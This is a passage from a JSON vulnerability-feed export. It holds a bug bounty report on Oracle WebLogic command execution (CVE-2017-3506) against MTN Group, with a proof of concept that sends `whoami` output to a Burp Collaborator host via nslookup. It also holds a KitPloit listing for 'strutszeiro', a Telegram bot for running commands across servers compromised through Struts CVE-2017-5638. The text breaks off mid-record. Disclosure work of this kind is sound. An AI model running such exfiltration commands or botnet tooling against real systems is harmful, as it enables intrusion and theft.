`whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net\nnslookup `whoami`.fexpwcppysiky1grj7mbodap5gb7zw.burpcollaborator.net\n```\n==**POC:**== {F736973}\n\n## Suggested Mitigation/Remediation Actions\n* Patching WebLogic to the recent version will fix the issue.\n\n## Impact\n\n**This vulnerability allow an unauthenticated attacker:**\n* To perform Remote OS Command Execution", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-03-04T14:20:40", "type": "hackerone", "title": "MTN Group: Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-3506]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506"], "modified": "2021-04-25T12:37:45", "id": "H1:810778", "href": "https://hackerone.com/reports/810778", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "kitploit": [{"lastseen": "2023-06-05T16:30:58", "description": "[](<https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s1600/telegram-bot.png>)\n\n \nTelegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) \n \n** Dependencies ** \n\n \n \n pip install -r requeriments.txt \n\n \n** Config ** \n\n \n \n Create a telegram bot, save the API token in config/token.conf\n Create a telegram group, save the group id in config/group.conf\n\n \n** Start ** \npython strutszeiro.py \n \n** Telegram Usage ** \n\n \n \n /add url - test vulnerability and add the new server\n /exploit url *cmd - execute commands in a specific server (you need to use the * caracter)\n /botnet cmd - execute commands in all servers\n /list - show all servers in botnet\n /total - show total of servers in botnet\n\nThanks to [ @btamburi ](<https://twitter.com/BrenoTamburi>) \n \n \n\n\n** [ Download strutszeiro ](<https://github.com/mthbernardes/strutszeiro>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T17:30:00", "type": "kitploit", "title": "strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, &q